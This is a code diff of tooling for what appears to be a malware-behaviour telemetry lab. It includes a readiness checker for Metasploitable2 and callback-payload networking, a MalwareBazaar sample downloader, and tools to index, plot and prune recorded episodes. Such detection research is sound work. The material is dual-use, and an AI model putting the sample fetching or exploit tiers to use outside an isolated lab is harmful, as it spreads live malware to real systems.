+                fix="check exploits/modules/*.toml syntax",
+            ))
+    images = Path("/var/lib/cis490/vm/images")
+    msf2 = images / "metasploitable2.qcow2"
+    if _path_exists(msf2):
+        report.add(Check(f"tier3: {msf2}", "ok",
+                         detail=_size_str(msf2)))
+    else:
+        report.add(Check(
+            f"tier3: {msf2}",
+            "warn",
+            detail="optional — needed for Tier-3 episodes",
+            fix="IMAGE_URL=… IMAGE_SHA256=… sudo /opt/cis490/scripts/fetch-metasploitable2.sh",
+        ))
+
+
+def check_bridge(report: Report) -> None:
+    """Bridge readiness — pcap (source 4) + reverse/bind callback
+    payloads both need this. Without it, Tier-3 episodes that pick
+    callback modules will fire but the session never lands."""
+    rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
+    if rc == 0 and "br-malware" in out:
+        if "UP" in out or "UNKNOWN" in out:
+            report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
+        else:
+            report.add(Check(
+                "bridge: br-malware up",
+                "warn",
+                detail=out.strip()[:80],
+                fix="sudo ip link set br-malware up",
+            ))
+    else:
+        report.add(Check(
+            "bridge: br-malware exists",
+            "warn",
+            detail="optional — pcap capture + callback-payload Tier-3 "
+                   "modules require it",
+            fix="sudo /opt/cis490/vm/setup_bridge.sh",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — end to end (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_end_to_end(report: Report) -> None:
+    cfg = "/etc/cis490/lab-host.toml"
+    if not _path_exists(Path(cfg)):
+        report.add(Check("e2e: cis490-shipper --ping", "skip",
+                         detail="no lab-host.toml"))
+        return
+    rc, out, err = _run([
+        "/opt/cis490/.venv/bin/python", "-m", "shipper",
+        "--config", cfg, "--ping",
+    ], timeout=15.0)
+    if rc == 0 and '"ok": true' in out:
+        report.add(Check("e2e: cis490-shipper --ping", "ok",
+                         detail="200 OK"))
+    else:
+        report.add(Check(
+            "e2e: cis490-shipper --ping",
+            "fail",
+            detail=(out or err)[:200],
+            fix="paste this row's detail into a Forgejo issue or to the operator",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv: list[str] | None = None) -> int:
+    global _JSON_MODE
+    p = argparse.ArgumentParser(prog="cis490-doctor")
+    p.add_argument("--role", choices=("lab-host", "receiver"), default="lab-host")
+    p.add_argument("--json", action="store_true",
+                   help="machine-readable output (suppresses progressive printing)")
+    p.add_argument("--no-tier3", action="store_true",
+                   help="skip the optional Tier-3 prerequisite checks")
+    args = p.parse_args(argv)
+    _JSON_MODE = args.json
+
+    repo_root = Path(__file__).resolve().parent.parent
+    if not _JSON_MODE:
+        print(f"{_ANSI_BOLD}cis490-doctor{_ANSI_RESET} role={args.role} repo={repo_root}\n")
+
+    report = Report(role=args.role)
+    check_repo(report, repo_root)
+    check_install(report, args.role)
+    if args.role == "lab-host":
+        check_certs_lab_host(report)
+    check_services(report, args.role)
+    if args.role == "lab-host":
+        check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
+        check_vm_prereqs(report)
+        check_bridge(report)
+        if not args.no_tier3:
+            check_tier3(report)
+        check_end_to_end(report)
+
+    summary = report.summary()
+    if _JSON_MODE:
+        json.dump(report.to_dict(), sys.stdout, indent=2)
+        print()
+    else:
+        print()
+        print(f"{_ANSI_BOLD}summary:{_ANSI_RESET} "
+              f"{_ANSI_GREEN}{summary['ok']} ok{_ANSI_RESET}, "
+              f"{_ANSI_YELLOW}{summary['warn']} warn{_ANSI_RESET}, "
+              f"{_ANSI_RED}{summary['fail']} fail{_ANSI_RESET}, "
+              f"{_ANSI_DIM}{summary['skip']} skip{_ANSI_RESET}")
+        if summary["fail"]:
+            print(
+                f"\n{_ANSI_BOLD}{_ANSI_RED}NOT READY.{_ANSI_RESET} "
+                "Run the `fix:` commands above in order, then re-run "
+                "`cis490-doctor`. When all rows are green/yellow, "
+                "episodes will start shipping to the Pi."
+            )
+        else:
+            print(
+                f"\n{_ANSI_BOLD}{_ANSI_GREEN}READY.{_ANSI_RESET} "
+                "Episodes should be flowing. Watch:\n"
+                "  sudo journalctl -u cis490-shipper -f\n"
+                "  ssh <pi> 'sudo tail -f /var/lib/cis490/index.jsonl'"
+            )
+
+    return 1 if summary["fail"] else 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
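The `--json` mode above emits the dict built by `Report.to_dict()`: a `role`, a list of `checks` (each with `name`, `status`, `detail`, `fix`), and a `summary` count. A minimal sketch of a consumer that pulls out the failing rows and their fix commands follows. `failing_fixes` and the sample payload are hypothetical, written against that shape rather than taken from the repo.

```python
import json


def failing_fixes(report: dict) -> list[tuple[str, str]]:
    """Return (check name, fix command) for every check with status 'fail'."""
    return [
        (check["name"], check.get("fix", ""))
        for check in report.get("checks", [])
        if check.get("status") == "fail"
    ]


# Hand-written sample in the shape Report.to_dict() produces.
sample = json.loads(
    """
    {
      "role": "lab-host",
      "checks": [
        {"name": "install: /opt/cis490 exists", "status": "ok",
         "detail": "", "fix": ""},
        {"name": "install: venv python", "status": "fail",
         "detail": "", "fix": "sudo /opt/cis490/scripts/install-lab-host.sh"},
        {"name": "tier3: msfrpcd on PATH", "status": "warn",
         "detail": "optional", "fix": "sudo /opt/cis490/scripts/install-msfrpcd.sh"}
      ],
      "summary": {"ok": 1, "warn": 1, "fail": 1, "skip": 0}
    }
    """
)

for name, fix in failing_fixes(sample):
    print(f"{name}: {fix}")
```

In practice the input would come from something like `json.load(sys.stdin)` with the doctor's `--json` output piped in. Warn rows are skipped here because only `fail` rows affect the exit code.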
--- a/tools/fetch_sample.py
+++ b/tools/fetch_sample.py
@ -0,0 +1,142 @@
+"""Fetch a malware sample by sha256 from MalwareBazaar.
+
+Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
+the hash on the way in, and prints the resulting path on stdout.
+
+Usage:
+
+    MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
+
+MalwareBazaar requires a free API key as of late 2023; sign up at
+https://bazaar.abuse.ch and either pass via env or place in
+``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
+zip is decrypted with the password ``infected`` per the MB convention.
+
+The fetcher is intentionally read-only over the network (no upload,
+no metadata posted), so a lab whose WG mesh has tightly firewalled
+egress can run it once on a build host and rsync the resulting
+``samples/store/`` directory across the fleet.
+"""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import os
+import sys
+import urllib.parse
+import urllib.request
+import zipfile
+from pathlib import Path
+
+
+MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
+MB_ZIP_PASSWORD = b"infected"
+
+
+def _read_api_key(repo_root: Path) -> str | None:
+    env = os.environ.get("MALWAREBAZAAR_API_KEY")
+    if env:
+        return env.strip()
+    token = repo_root / "samples" / ".bazaar.token"
+    if token.exists():
+        return token.read_text().strip()
+    return None
+
+
+def fetch_sample(
+    sha256: str,
+    out_dir: Path,
+    api_key: str,
+    *,
+    timeout_s: float = 60.0,
+) -> Path:
+    if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
+        raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
+    sha256 = sha256.lower()
+    out_dir.mkdir(parents=True, exist_ok=True)
+
+    target = out_dir / sha256
+    if target.exists():
+        actual = hashlib.sha256(target.read_bytes()).hexdigest()
+        if actual == sha256:
+            return target
+        target.unlink()  # tampered or partial; refetch.
+
+    body = urllib.parse.urlencode({
+        "query": "get_file",
+        "sha256_hash": sha256,
+    }).encode("utf-8")
+    req = urllib.request.Request(
+        MB_ENDPOINT,
+        data=body,
+        headers={
+            "Auth-Key": api_key,
+            "User-Agent": "cis490-fetcher/0",
+        },
+        method="POST",
+    )
+    with urllib.request.urlopen(req, timeout=timeout_s) as r:
+        payload = r.read()
+
+    if not payload.startswith(b"PK"):
+        raise RuntimeError(
+            f"MalwareBazaar returned non-zip response (first 200 bytes): "
+            f"{payload[:200]!r}"
+        )
+
+    zip_path = out_dir / f"{sha256}.zip"
+    zip_path.write_bytes(payload)
+    try:
+        with zipfile.ZipFile(zip_path) as zf:
+            zf.setpassword(MB_ZIP_PASSWORD)
+            names = zf.namelist()
+            if not names:
+                raise RuntimeError(f"{sha256}: empty zip")
+            with zf.open(names[0]) as src, target.open("wb") as dst:
+                dst.write(src.read())
+    finally:
+        zip_path.unlink(missing_ok=True)
+
+    actual = hashlib.sha256(target.read_bytes()).hexdigest()
+    if actual != sha256:
+        target.unlink()
+        raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
+    return target
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="fetch_sample")
+    p.add_argument("sha256")
+    p.add_argument(
+        "--out-dir",
+        type=Path,
+        default=None,
+        help="Where to drop <sha256> (default: samples/store/ relative to repo)",
+    )
+    args = p.parse_args(argv)
+
+    repo_root = Path(__file__).resolve().parent.parent
+    out_dir = args.out_dir or (repo_root / "samples" / "store")
+
+    api_key = _read_api_key(repo_root)
+    if not api_key:
+        print(
+            "no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
+            "samples/.bazaar.token (mode 0600). Register at "
+            "https://bazaar.abuse.ch.",
+            file=sys.stderr,
+        )
+        return 2
+
+    try:
+        path = fetch_sample(args.sha256, out_dir, api_key)
+    except Exception as e:
+        print(f"fetch failed: {e}", file=sys.stderr)
+        return 1
+    print(path)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
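
Editor's note on `tools/fetch_sample.py`: both the cache check and the post-download verification hash the whole file in memory via `read_bytes()`. A minimal sketch of the same check done in fixed-size chunks follows. `sha256_file` and `is_cached` are hypothetical helper names used only for illustration; they are not part of the module.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hypothetical helper: hash a file in fixed-size chunks."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        # iter() with a sentinel stops at the first empty read (EOF).
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def is_cached(target: Path, expected_sha256: str) -> bool:
    """True only if target exists and its content hash matches."""
    return target.exists() and sha256_file(target) == expected_sha256.lower()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        blob = Path(tmp) / "blob"
        blob.write_bytes(b"harmless test bytes")
        good = hashlib.sha256(b"harmless test bytes").hexdigest()
        print(is_cached(blob, good))      # matching digest
        print(is_cached(blob, "0" * 64))  # mismatching digest
```

A mismatch here corresponds to the "tampered or partial; refetch" branch in `fetch_sample`.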
--- a/tools/index_reader.py
+++ b/tools/index_reader.py
@ -0,0 +1,136 @@
+"""Read + filter the receiver's ``index.jsonl``.
+
+Usage:
+
+    # All episodes from one host:
+    cis490-index --host lab-host-1
+
+    # All episodes for a particular sample:
+    cis490-index --sample xmrig-cryptominer
+
+    # Today's episodes, sorted by size:
+    cis490-index --since 2026-04-30 --sort size
+
+    # Group/count by host:
+    cis490-index --count-by host_id
+
+The index file is the closest thing to a database the receiver has
+until we move to Postgres/Timescale. This tool is the temporary CLI
+view over it; it's intentionally read-only and never opens episode
+tarballs (just the index rows).
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from collections import Counter
+from datetime import datetime, timezone
+from pathlib import Path
+
+
+DEFAULT_INDEX = "/var/lib/cis490/index.jsonl"
+
+
+def _parse_since(s: str) -> datetime:
+    # Accept ISO-8601 with or without time.
+    for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d", "%Y-%m-%dT%H:%M:%S"):
+        try:
+            dt = datetime.strptime(s, fmt)
+            if dt.tzinfo is None:
+                dt = dt.replace(tzinfo=timezone.utc)
+            return dt
+        except ValueError:
+            continue
+    # Last resort: fromisoformat which handles a wider range in 3.11+.
+    dt = datetime.fromisoformat(s)
+    if dt.tzinfo is None:
+        dt = dt.replace(tzinfo=timezone.utc)
+    return dt
+
+
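+def _row_time(row: dict) -> datetime | None:
+    s = row.get("received_at_wall")
+    if not s:
+        return None
+    try:
+        dt = datetime.fromisoformat(s.replace("Z", "+00:00"))
+    except ValueError:
+        return None
+    # Treat naive timestamps as UTC so comparisons against the
+    # tz-aware --since/--until bounds cannot raise TypeError.
+    if dt.tzinfo is None:
+        dt = dt.replace(tzinfo=timezone.utc)
+    return dt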
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-index")
+    p.add_argument("--index", default=DEFAULT_INDEX,
+                   help=f"path to index.jsonl (default {DEFAULT_INDEX})")
+    p.add_argument("--host", help="only rows from this host_id")
+    p.add_argument("--sample",
+                   help="only rows whose meta.sample.name matches "
+                        "(requires meta.json from a recent commit)")
+    p.add_argument("--since", help="ISO date or datetime; only rows received on/after")
+    p.add_argument("--until", help="ISO date or datetime; only rows received before")
+    p.add_argument("--sort", choices=("time", "size", "host"), default="time")
+    p.add_argument("--count-by",
+                   choices=("host_id", "schema_version"),
+                   help="instead of printing rows, group + count by this field")
+    p.add_argument("--limit", type=int, default=0,
+                   help="cap output rows (0 = all)")
+    args = p.parse_args(argv)
+
+    path = Path(args.index)
+    if not path.exists():
+        print(f"no index at {path}", file=sys.stderr)
+        return 2
+
+    since = _parse_since(args.since) if args.since else None
+    until = _parse_since(args.until) if args.until else None
+
+    rows: list[dict] = []
+    with path.open() as f:
+        for line in f:
+            line = line.strip()
+            if not line:
+                continue
+            try:
+                row = json.loads(line)
+            except json.JSONDecodeError:
+                continue
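+            if args.host and row.get("host_id") != args.host:
+                continue
+            if args.sample:
+                # --sample was parsed but never applied. Assumes the
+                # receiver copies meta.json into the row under "meta";
+                # rows without meta.sample never match.
+                sample = (row.get("meta") or {}).get("sample") or {}
+                if sample.get("name") != args.sample:
+                    continue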
+            if since or until:
+                t = _row_time(row)
+                if t is None:
+                    continue
+                if since and t < since:
+                    continue
+                if until and t >= until:
+                    continue
+            rows.append(row)
+
+    if args.count_by:
+        counts = Counter(r.get(args.count_by, "<missing>") for r in rows)
+        for k, n in counts.most_common():
+            print(f"{n:>6}  {k}")
+        return 0
+
+    sort_keys = {
+        "time": lambda r: r.get("received_at_wall", ""),
+        "size": lambda r: r.get("size_bytes", 0),
+        "host": lambda r: r.get("host_id", ""),
+    }
+    rows.sort(key=sort_keys[args.sort])
+    if args.limit:
+        rows = rows[-args.limit:] if args.sort != "size" else rows[:args.limit]
+
+    # Print TSV-ish for quick eyeballing + downstream pipe-friendliness.
+    print("received_at_wall\thost_id\tepisode_id\tsize_bytes\tschema_version\tsha256")
+    for r in rows:
+        print("\t".join(str(r.get(k, "")) for k in
+                        ("received_at_wall", "host_id", "episode_id",
+                         "size_bytes", "schema_version", "sha256")))
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
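
Editor's note on `tools/index_reader.py`: `--since` and `--until` form a half-open window (`since <= t < until`), and naive inputs are read as UTC. A minimal sketch of that rule in isolation, assuming Python 3.7+ for `datetime.fromisoformat`; `to_utc` and `in_window` are hypothetical names, not functions from the tool.

```python
from __future__ import annotations

from datetime import datetime, timezone


def to_utc(s: str) -> datetime:
    """Parse an ISO-8601 date or datetime; naive values are taken as UTC."""
    dt = datetime.fromisoformat(s.replace("Z", "+00:00"))
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def in_window(ts: str, since: str | None, until: str | None) -> bool:
    """Half-open interval test: since <= ts < until."""
    t = to_utc(ts)
    if since and t < to_utc(since):
        return False
    if until and t >= to_utc(until):
        return False
    return True


if __name__ == "__main__":
    # Midday on the 30th is inside [04-30, 05-01).
    print(in_window("2026-04-30T12:00:00Z", "2026-04-30", "2026-05-01"))
    # Midnight on 05-01 is excluded because the upper bound is exclusive.
    print(in_window("2026-05-01T00:00:00Z", "2026-04-30", "2026-05-01"))
```

With an exclusive upper bound, consecutive daily windows never count the same row twice.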
--- a/tools/plot_envelope.py
+++ b/tools/plot_envelope.py
@ -1,8 +1,19 @@
 """Plot a single episode's envelope.

-Reads ``telemetry-proc.jsonl`` and ``labels.jsonl`` from an episode directory
-and renders a 3-panel chart: CPU%, RSS, IO write rate, with phase bands
-underneath.
+Renders a multi-panel chart from whatever telemetry the episode dir
+contains, with phase bands underneath each panel:
+
+  panel 1 — host /proc CPU%      (source 1, always)
+  panel 2 — host /proc RSS       (source 1, always)
+  panel 3 — host /proc IO write  (source 1, always)
+  panel 4 — QMP block I/O ops    (source 2, if telemetry-qmp.jsonl)
+  panel 5 — perf IPC + miss-rate (source 3, if telemetry-perf.jsonl)
+  panel 6 — bridge pcap pkts/s   (source 4, if netflow.jsonl)
+  panel 7 — guest agent CPU/load (source 5, if telemetry-guest.jsonl)
+
+Missing sources are silently skipped — a Tier-1 episode dir with only
+proc telemetry still gets the original 3-panel plot. A Tier-3+ run
+with all five sources gets the full stack on a shared time axis.

 Two modes:

@ -103,21 +114,77 @@ def main() -> int:
        end = labels[i + 1]["t_mono_ns"] / 1e9 if i + 1 < len(labels) else end_t
        spans.append((start, end, lbl["phase"]))

-    fig, axes = plt.subplots(3, 1, figsize=(13, 8), sharex=True)
+    # Discover optional sources.
+    qmp_rows = _load_jsonl(d / "telemetry-qmp.jsonl") if (d / "telemetry-qmp.jsonl").exists() else []
+    perf_rows = _load_jsonl(d / "telemetry-perf.jsonl") if (d / "telemetry-perf.jsonl").exists() else []
+    netflow_rows = _load_jsonl(d / "netflow.jsonl") if (d / "netflow.jsonl").exists() else []
+    guest_rows = _load_jsonl(d / "telemetry-guest.jsonl") if (d / "telemetry-guest.jsonl").exists() else []

-    axes[0].plot(t, cpu_pct, color="#222222", linewidth=1.0)
-    axes[0].set_ylabel("CPU %")
-    axes[0].set_ylim(-3, 110)
-    axes[0].grid(alpha=0.25)
+    panels: list[tuple[str, callable]] = []  # (ylabel, plot_fn(ax))
+    panels.append(("CPU % (proc)", lambda ax: (
+        ax.plot(t, cpu_pct, color="#222222", linewidth=1.0),
+        ax.set_ylim(-3, 110),
+    )))
+    panels.append(("RSS (MiB)", lambda ax: ax.plot(t, rss_mib, color="#222222", linewidth=1.0)))
+    panels.append(("IO write (KiB/s)", lambda ax: ax.plot(t, io_kb_s, color="#222222", linewidth=1.0)))

-    axes[1].plot(t, rss_mib, color="#222222", linewidth=1.0)
-    axes[1].set_ylabel("RSS (MiB)")
-    axes[1].grid(alpha=0.25)
+    if qmp_rows:
+        qt = [r["t_mono_ns"] / 1e9 for r in qmp_rows]
+        # Sum block I/O ops across devices.
+        wr_ops = []
+        rd_ops = []
+        for r in qmp_rows:
+            bs = r.get("blockstats") or {}
+            wr_ops.append(sum(dev.get("wr_ops", 0) for dev in bs.values()))
+            rd_ops.append(sum(dev.get("rd_ops", 0) for dev in bs.values()))
+        panels.append(("QMP block ops (cum)", lambda ax: (
+            ax.plot(qt, wr_ops, color="#cc4444", linewidth=1.0, label="wr_ops"),
+            ax.plot(qt, rd_ops, color="#4488cc", linewidth=1.0, label="rd_ops"),
+            ax.legend(loc="upper left", fontsize=8),
+        )))

-    axes[2].plot(t, io_kb_s, color="#222222", linewidth=1.0)
-    axes[2].set_ylabel("IO write (KiB/s)")
-    axes[2].set_xlabel("time (s)")
-    axes[2].grid(alpha=0.25)
+    if perf_rows:
+        pt = [r["t_mono_ns"] / 1e9 for r in perf_rows]
+        ipc = [r.get("ipc") or 0 for r in perf_rows]
+        miss = [r.get("cache_miss_rate") or 0 for r in perf_rows]
+        panels.append(("perf IPC / miss-rate", lambda ax: (
+            ax.plot(pt, ipc, color="#222222", linewidth=1.0, label="IPC"),
+            ax.plot(pt, miss, color="#cc4444", linewidth=1.0, label="cache miss rate"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+
+    if netflow_rows:
+        nt = [r["t_mono_ns"] / 1e9 for r in netflow_rows]
+        pkts = [(r.get("pkts_in", 0) + r.get("pkts_out", 0)) for r in netflow_rows]
+        synf = [r.get("syn_count", 0) for r in netflow_rows]
+        panels.append(("bridge pkts / SYNs (per 100 ms)", lambda ax: (
+            ax.plot(nt, pkts, color="#222222", linewidth=1.0, label="pkts"),
+            ax.plot(nt, synf, color="#cc4444", linewidth=1.0, label="syn"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+
+    if guest_rows:
+        gt = [r["t_mono_ns"] / 1e9 for r in guest_rows]
+        load1 = [(r.get("load_1m_5m_15m") or [0])[0] for r in guest_rows]
+        mem_used = [
+            ((r.get("mem_total_bytes") or 0) - (r.get("mem_available_bytes") or 0)) / (1024 * 1024)
+            for r in guest_rows
+        ]
+        panels.append(("guest load1 / mem_used (MiB)", lambda ax: (
+            ax.plot(gt, load1, color="#222222", linewidth=1.0, label="load1"),
+            ax.twinx().plot(gt, mem_used, color="#4488cc", linewidth=1.0, label="mem MiB"),
+        )))
+
+    n = len(panels)
+    fig, axes = plt.subplots(n, 1, figsize=(13, 2 + 1.6 * n), sharex=True)
+    if n == 1:
+        axes = [axes]
+
+    for ax, (ylabel, plot_fn) in zip(axes, panels):
+        plot_fn(ax)
+        ax.set_ylabel(ylabel)
+        ax.grid(alpha=0.25)
+    axes[-1].set_xlabel("time (s)")

    for ax in axes:
        for start, end, phase in spans:
--- a/tools/prune_episodes.py
+++ b/tools/prune_episodes.py
@ -0,0 +1,364 @@
+"""``cis490-prune`` — retroactively filter low-quality episodes from
+the receiver's dataset.
+
+The signals that mark an episode as low-quality:
+
+  no-sample          meta.sample is null. Pre-Sample-propagation code
+                     (commit a193d17 or earlier) ran the v1 yes-loop
+                     fallback regardless of what the fleet picked, so
+                     post-infection variety isn't recorded in meta.
+
+  no-workload-events events.jsonl has zero workload_* rows. Pre-audit-
+                     trail code (commit d86502d or earlier) ran with
+                     no event emission from VMLoadController, so we
+                     can't tell whether the workload actually fired.
+
+  workload-failed    events.jsonl contains a workload_failed row. The
+                     SerialClient.run() raised mid-phase; the labels
+                     and telemetry don't match what the orchestrator
+                     was supposed to be doing.
+
+  workload-silent    workload_killed event during the dormant phase
+                     has pre_kill_probe.yes == "0", meaning no
+                     ``yes``-loop process was running when we tried
+                     to kill it. This is the elliott-lab fingerprint:
+                     the schedule walked but nothing fired in-guest.
+
+  flat-cpu           Per-phase median /proc CPU% differs by less than
+                     5 percentage points between the busiest and the
+                     quietest phase. A model trained on these episodes
+                     can't distinguish phases.
+
+Usage:
+    cis490-prune                     # dry-run summary, no changes
+    cis490-prune --reason no-sample  # filter to one signal
+    cis490-prune --archive           # mv flagged episodes to
+                                     #   /var/lib/cis490/episodes-archive/
+    cis490-prune --delete            # rm flagged episodes + index rows
+
+Run on the receiver host, where /var/lib/cis490/ lives. Run it as
+root: the episode store is owned by the cis490 user with mode
+0640.
+"""
+
+from __future__ import annotations
+
+import argparse
+import io
+import json
+import os
+import shutil
+import statistics
+import subprocess
+import sys
+import tarfile
+import tempfile
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Iterator
+
+
+_REASONS = (
+    "no-sample",
+    "no-workload-events",
+    "workload-failed",
+    "workload-silent",
+    "flat-cpu",
+)
+
+
+@dataclass
+class EpisodeQuality:
+    host_id: str
+    episode_id: str
+    tar_path: Path
+    size_bytes: int
+    reasons: list[str] = field(default_factory=list)
+    sample_name: str | None = None
+    module_name: str | None = None
+
+    @property
+    def fake(self) -> bool:
+        return bool(self.reasons)
+
+
+# ---------------------------------------------------------------------------
+# tarball introspection
+# ---------------------------------------------------------------------------
+
+
+def _read_jsonl_from_tar(tar: tarfile.TarFile, name_suffix: str) -> list[dict]:
+    """Extract a JSONL member by name suffix (e.g. 'events.jsonl')."""
+    for m in tar.getmembers():
+        if m.name.endswith(name_suffix) and m.isfile():
+            f = tar.extractfile(m)
+            if f is None:
+                return []
+            text = f.read().decode("utf-8", errors="replace")
+            return [json.loads(line) for line in text.splitlines() if line.strip()]
+    return []
+
+
+def _read_meta_from_tar(tar: tarfile.TarFile) -> dict:
+    for m in tar.getmembers():
+        if m.name.endswith("meta.json") and m.isfile():
+            f = tar.extractfile(m)
+            if f is None:
+                return {}
+            return json.loads(f.read().decode("utf-8"))
+    return {}
+
+
+def _decompress_zstd(zst_path: Path) -> bytes:
+    """Pure stdlib doesn't have zstd; shell out (already a project dep
+    — install scripts require it)."""
+    p = subprocess.run(
+        ["zstd", "-q", "-d", "--stdout", str(zst_path)],
+        check=True, capture_output=True,
+    )
+    return p.stdout
+
+
+def classify_episode(tar_zst: Path, host_id: str, episode_id: str) -> EpisodeQuality:
+    """Open the tarball, scan meta + events + telemetry, return a
+    quality verdict. Each signal is independent — an episode can hit
+    multiple reasons (e.g. no-sample + workload-silent)."""
+    q = EpisodeQuality(
+        host_id=host_id,
+        episode_id=episode_id,
+        tar_path=tar_zst,
+        size_bytes=tar_zst.stat().st_size,
+    )
+
+    try:
+        raw = _decompress_zstd(tar_zst)
+    except (subprocess.CalledProcessError, OSError) as e:
+        q.reasons.append(f"unreadable: {e}"[:80])
+        return q
+
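+    try:
+        with tarfile.open(fileobj=io.BytesIO(raw)) as tar:
+            meta = _read_meta_from_tar(tar)
+            events = _read_jsonl_from_tar(tar, "events.jsonl")
+            proc = _read_jsonl_from_tar(tar, "telemetry-proc.jsonl")
+            labels = _read_jsonl_from_tar(tar, "labels.jsonl")
+    except (tarfile.TarError, ValueError) as e:
+        # A corrupt archive or a malformed JSON member should not abort
+        # the whole scan; report it like a failed decompression.
+        q.reasons.append(f"unreadable: {e}"[:80])
+        return q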
+
+    sample = meta.get("sample")
+    if sample is None:
+        q.reasons.append("no-sample")
+    else:
+        q.sample_name = sample.get("name")
+
+    exploit = meta.get("exploit")
+    if exploit is not None:
+        q.module_name = exploit.get("module_name")
+
+    workload_events = [e for e in events if str(e.get("event", "")).startswith("workload_")]
+    if not workload_events:
+        q.reasons.append("no-workload-events")
+    if any(e.get("event") == "workload_failed" for e in events):
+        q.reasons.append("workload-failed")
+
+    # workload-silent: dormant transition's probe shows no `yes` proc.
+    for e in events:
+        if e.get("event") != "workload_killed":
+            continue
+        if e.get("phase") != "dormant":
+            continue
+        probe = e.get("pre_kill_probe")
+        if isinstance(probe, dict) and probe.get("yes") == "0":
+            q.reasons.append("workload-silent")
+            break
+
+    # flat-cpu: bucket /proc CPU% by phase, check inter-phase spread.
+    if proc and labels:
+        clk_tck = os.sysconf("SC_CLK_TCK")
+
+        def phase_at(t_ns: int) -> str:
+            cur = "(pre)"
+            for l in labels:
+                if l["t_mono_ns"] <= t_ns:
+                    cur = l["phase"]
+                else:
+                    break
+            return cur
+
+        per_phase: dict[str, list[float]] = {}
+        prev = None
+        for r in proc:
+            if prev is not None:
+                dt = (r["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
+                if dt > 0:
+                    djiff = (r["cpu_user_jiffies"] + r["cpu_sys_jiffies"]) - \
+                            (prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
+                    pct = 100.0 * (djiff / clk_tck) / dt
+                    per_phase.setdefault(phase_at(r["t_mono_ns"]), []).append(pct)
+            prev = r
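+        if per_phase:
+            medians = [statistics.median(v) for v in per_phase.values() if v]
+            # A spread needs at least two phases; a single-phase episode
+            # would otherwise always read as flat.
+            if len(medians) >= 2 and (max(medians) - min(medians)) < 5.0:
+                q.reasons.append("flat-cpu")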
+
+    return q
+
+
+# ---------------------------------------------------------------------------
+# Index walking + actions
+# ---------------------------------------------------------------------------
+
+
+def walk_index(index_path: Path, episodes_root: Path) -> Iterator[tuple[dict, Path]]:
+    if not index_path.exists():
+        return
+    for line in index_path.read_text().splitlines():
+        if not line.strip():
+            continue
+        try:
+            row = json.loads(line)
+        except json.JSONDecodeError:
+            continue
+        host = row.get("host_id", "")
+        ep = row.get("episode_id", "")
+        if not host or not ep:
+            continue
+        tar = episodes_root / host / f"{ep}.tar.zst"
+        if not tar.exists():
+            continue
+        yield row, tar
+
+
+def apply_action(
+    quals: list[EpisodeQuality],
+    *,
+    action: str,
+    archive_root: Path,
+    index_path: Path,
+) -> None:
+    """Carry out --delete or --archive on flagged episodes + drop
+    matching rows from index.jsonl. Atomic-ish: index rewrite is
+    single-shot after all tarballs are handled."""
+    if action not in ("delete", "archive"):
+        return
+    flagged_ids = {q.episode_id for q in quals if q.fake}
+    if not flagged_ids:
+        return
+
+    if action == "archive":
+        archive_root.mkdir(parents=True, exist_ok=True)
+    for q in quals:
+        if not q.fake:
+            continue
+        if action == "archive":
+            target = archive_root / q.host_id
+            target.mkdir(parents=True, exist_ok=True)
+            shutil.move(str(q.tar_path), target / q.tar_path.name)
+        elif action == "delete":
+            q.tar_path.unlink(missing_ok=True)
+
+    if index_path.exists():
+        kept = []
+        for line in index_path.read_text().splitlines():
+            try:
+                row = json.loads(line)
+            except json.JSONDecodeError:
+                kept.append(line)
+                continue
+            if row.get("episode_id") in flagged_ids:
+                continue
+            kept.append(line)
+        # Rewrite via tempfile + replace so a crash mid-write doesn't
+        # corrupt the live index.
+        tmp = index_path.with_suffix(".jsonl.partial")
+        tmp.write_text("\n".join(kept) + ("\n" if kept else ""))
+        os.replace(tmp, index_path)
+
+
+# ---------------------------------------------------------------------------
+# CLI
+# ---------------------------------------------------------------------------
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-prune")
+    p.add_argument("--episodes-root", type=Path,
+                   default=Path("/var/lib/cis490/episodes"))
+    p.add_argument("--index", type=Path,
+                   default=Path("/var/lib/cis490/index.jsonl"))
+    p.add_argument("--archive-root", type=Path,
+                   default=Path("/var/lib/cis490/episodes-archive"))
+    p.add_argument("--reason", action="append", choices=_REASONS,
+                   help="Only flag episodes matching this reason. Repeat "
+                        "to OR multiple. Default: all reasons.")
+    p.add_argument("--host", help="Only consider episodes from this host_id")
+    action = p.add_mutually_exclusive_group()
+    action.add_argument("--delete", action="store_true",
+                        help="Remove flagged tarballs + drop their index rows")
